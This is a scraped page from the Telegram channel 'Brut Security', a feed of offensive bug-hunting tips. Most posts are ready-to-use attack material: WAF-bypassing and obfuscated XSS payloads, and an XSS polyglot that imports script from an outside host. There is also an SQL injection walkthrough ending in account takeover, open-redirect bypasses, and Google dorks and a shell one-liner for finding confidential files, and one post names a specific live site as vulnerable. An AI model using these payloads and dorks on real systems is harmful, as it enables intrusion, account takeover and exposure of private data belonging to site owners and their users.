Brut Security – Telegram
Brut Security
14.7K subscribers
911 photos
73 videos
287 files
969 links
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Download Telegram
🫡Automate Your XSS
#!/bin/bash read TARGET
subfinder -d $TARGET -silent | tee domains.txt cat domains.txt | waybackurls | tee waybackurls.txt
cat waybackurls.txt | dalfox pipe
👍2
New XSS Bypass Cloudflare WAF 🧱

Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
13
New Xss Fly Under Radar Cloudflare Bypass 🧱

Payload :

"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>


Credit -Halim
👍23
📢a XSS payload, Cuneiform-alphabet based !
This payload was on trend back in 2020, but it still works :)

𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟]𒁹")()

(Cuneiform is a logo-syllabic noscript that was used to write several languages of the Ancient Near East. The noscript was in active use from the early Bronze Age until the beginning of the Common Era. It is named for the characteristic wedge-shaped impressions (Latin: cuneus) which form its signs.)

Source - Wikipedia
4👍1😁1
Google Dork - Sensitive Docs 📄

ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx
intext:“confidential” | intext:“Not for Public Release” | intext:”internal use only” | intext:“do not distribute”
👍7🔥2
Google Dork - Server Errors

inurl:"error" | innoscript:"exception" | innoscript:"failure" | innoscript:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com
👍2
Google Dork - High % keywords 🚀
inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com
👍3
Dork: Apache Server Leakage
inurl:server-status "apache server status" "cpu usage"


Reference: https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a

Vulnerable Site- https://www.itronot.co.il/server-status
3🔥1
Look into subdomains that allow sign-in with Google, as they may contain sensitive information accessible only to team members.

Dork: site:*.example.com inurl:login | inurl:signin Google
9👍2
Open Redirect Bypasses
🔥13👍7
Brut Security pinned «Keep checking my old Posts to continue your learning Process!»
Case Insensitivity Vulnerability

/api/docs/index.html ==> 403 Forbidden
/api/Docs/index.html ==> 200 Ok
👍73
Brut Security pinned Deleted message
SQL Injection to Account Takeover Manually :)
1. Enter mobile number to login intercept
{"mobile_number":"8888888888"} >> 200
{"mobile_number":"8888888888'"} >> 500
{"mobile_number":"8888888888''"} >> 200

2. Final Query:
8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') --

2024-04-03 21:20:55 >> Exact time and date
1 >> attempts
you can see the 200 response

last you can login with the 1110 OTP and get access to the victim account :)

Credit- Kullai
👍75
Bypass open redirection whitelisted using chinese dots: 👀🔓🔍

%E3%80%82

Tip: Keep eyes on SSO redirects 😉🔀

credit: @adrielsec
🫡64🔥2
Short #XSS Polyglot Payload

'/*\'/*"/*\"/*</Script>
<Input/AutoFocus/OnFocus=/**/
(import(/https:\\X55.is/.source))//>


Note- It works for most HTML and JS injection scenarios.

Credit- knoxss.me (Not an AD)
👍53
🚨Subdominator - Unleash the Power of Subdomain Enumeration🚨

📢Subdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources.


🔗Link- https://github.com/RevoltSecurities/Subdominator
🔥63👍3😁1
♨️One-liner to find sensitive PDF file♨️
for i in `cat apex-domains.txt | gau --subs --threads 16 | grep -Ea '\.pdf' | httpx -silent -mc 200`; do if curl -s "$i" | pdftotext -q - - | grep -Eaiq 'internal use|classified'; then echo $i; fi; done
21👍1
Brut Security pinned Deleted message